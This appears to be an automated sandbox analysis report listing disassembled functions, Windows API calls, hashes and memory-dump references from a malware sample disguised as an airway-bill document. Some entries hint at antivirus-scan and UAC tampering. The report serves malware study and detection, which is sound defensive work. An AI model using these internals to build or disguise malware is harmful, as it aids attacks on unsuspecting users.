                                                                                                      • Part of subcall function 02B27F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B33880,02B35C91,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B27F37
                                                                                                    • GetLastError.KERNEL32(00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C9B
                                                                                                      • Part of subcall function 02B2A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B2C359,00000000,02B2C3B3), ref: 02B2A717
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 503785936-0
                                                                                                    • Opcode ID: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                    • Instruction ID: 679de02c7d1e6923f602fde8100a4eae514b70061ba55b019b93c06bb71eb56c
                                                                                                    • Opcode Fuzzy Hash: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                    • Instruction Fuzzy Hash: AD317270A003149FDB11EFA8C88179EB7F6AF48314F9084A5E518AB380DB755A498FA5
                                                                                                    Function 02B3E6B6 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                    • RegSetValueExA.ADVAPI32(00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                    • RegCloseKey.ADVAPI32(00000A74,00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                    • Instruction ID: f606575ae45da6468a978fbeed0b42716142a2fb6fe5f03ac61dbf3ab40ceb67
                                                                                                    • Opcode Fuzzy Hash: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                    • Instruction Fuzzy Hash: FD110371A10314AFE701EBA4DC819AD7BBDEB49750F5005A1FA08D7650D734DE45CE61
                                                                                                    Function 02B3E6B8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                    • RegSetValueExA.ADVAPI32(00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                    • RegCloseKey.ADVAPI32(00000A74,00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                    • Instruction ID: c8121d2c3b9e1f3927617ade14a9987146b90d8259490800ccdc2d05c24774b8
                                                                                                    • Opcode Fuzzy Hash: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                    • Instruction Fuzzy Hash: 58110371A10314AFE701EBA4D88199D7BBDEB49750F5005A1F608D7650D734DA45CE61
                                                                                                    Function 02B2E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                    • Instruction ID: ac36e5fc09ac2e5a5db20bfa2257a53e0431beb31e33cb5368e76ff476ffc371
                                                                                                    • Opcode Fuzzy Hash: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                    • Instruction Fuzzy Hash: 02F0C861718330C79B227B3B9E845AD27969F0874275494E5A44E9B205CB24EC0DCB62
                                                                                                    Function 02B24CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02B24D07
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02B24D19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 986138563-0
                                                                                                    • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                    • Instruction ID: 6c3f78a8d2133a0a27c54277c824a072fa3944722b1e73d9c2f04514de68636a
                                                                                                    • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                    • Instruction Fuzzy Hash: 7FE012B81153216EEF182F299C40B37373AEFC1751B5454D9B84CCA555D734C449AD34
                                                                                                    Function 02B3705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02B3735A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    • Opcode ID: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                    • Instruction ID: bdf4cf3cc3a075be054efa66091c9afff1584f06097c7ae130a589e2b765ba8f
                                                                                                    • Opcode Fuzzy Hash: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                    • Instruction Fuzzy Hash: 7AB1D3B5A01608EFDB15CF99D980A9DFBF2FF4A314F1481A9E845AB360DB30A845DF50
                                                                                                    Function 02B2E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B2E701
                                                                                                      • Part of subcall function 02B2E2E4: VariantClear.OLEAUT32(?), ref: 02B2E2F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    • Opcode ID: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                    • Instruction ID: 3859d639ccd92b464da088c1717b4148f827e8fe83a52248a4dc4fbe64e6451b
                                                                                                    • Opcode Fuzzy Hash: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                    • Instruction Fuzzy Hash: C311703070033097CB21EF6AC8C4A6A77AAEF5965071454E6E64E8B265DB30EC0DCAA1
                                                                                                    Function 02B215CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 4275171209-3339448193
                                                                                                    • Opcode ID: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                                                    • Instruction ID: 6bc3129b6980054ab98f3620fc1b0261f8c5fa94a0e7c892ea6541d6774eab5c
                                                                                                    • Opcode Fuzzy Hash: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                                                    • Instruction Fuzzy Hash: 97F0F9F0B513004FEB05DF7999443057AE6EB89389F1485B9E709DB399E771D4198B10
                                                                                                    Function 02B2E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    • Opcode ID: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                    • Instruction ID: 37fb33052693bec0e8c91ee4d4b4f99e2090fef439e3d9e32e61c4891298f951
                                                                                                    • Opcode Fuzzy Hash: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                    • Instruction Fuzzy Hash: CE316F71600328ABDB11DEAAC984AAE77B8EB0C301F4845E1F91DD7250D334F958CB61
                                                                                                    Function 02B36CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4225568880-0
                                                                                                    • Opcode ID: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                    • Instruction ID: 6ca04686244a69351007b29f1fdcdee3a242afc09b583c784f1a87b73c4fa994
                                                                                                    • Opcode Fuzzy Hash: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                    • Instruction Fuzzy Hash: 8BE0E530200354BFE312EBA5CC0195A77BDDB49B40B5108F1B804D7510DA305D088864
                                                                                                    Function 02B25814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832
                                                                                                      • Part of subcall function 02B25A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                      • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                      • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                      • Part of subcall function 02B25A78: RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 2796650324-0
                                                                                                    • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                    • Instruction ID: ec2e068fef510ae88d5aa20802f0e3d832a6390947f2cf17fbe46fbc01d70543
                                                                                                    • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                    • Instruction Fuzzy Hash: 20E06D71A003248BCB24DE5C88C0A5637D8AB08750F4005A5EC58DF34AD3B0E9588BD0
                                                                                                    Function 02B27D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B27DA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                    • Instruction ID: 5be0ff0480d8eec0c22653ce75bdf1a026931da633dce5af00bb0e8753da3c6e
                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                    • Instruction Fuzzy Hash: 32D05BB23082507AD220955A5C44EFB6BDCCFC9770F100679B65CC3180D7208C0587B1
                                                                                                    Function 02B27E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                    • Instruction ID: d7678910550ce20209b4aa3b702b079867ba496f6357d968b5c572fa92964d48
                                                                                                    • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                    • Instruction Fuzzy Hash: 84C08CB02123280E1E50B2FC0CC450E428C8B052383B02FE1E63CD61D2DB25D85E3430
                                                                                                    Function 02B27E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                    • Instruction ID: 080508bb58a6f946d11d0a9c625fc55499b04c5fa561b98b89af562099ce8e2e
                                                                                                    • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                    • Instruction Fuzzy Hash: 6FC08CE02023220A1A50B1FC0CC402A428C8B091383A42FE2E63CEA2E2DB25882F3430
                                                                                                    Function 02B24C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                    • Instruction ID: 7828a7fa3cc2a63a7fb7fddbea92434594ee396cb8bfdb4702b14bb4848097a4
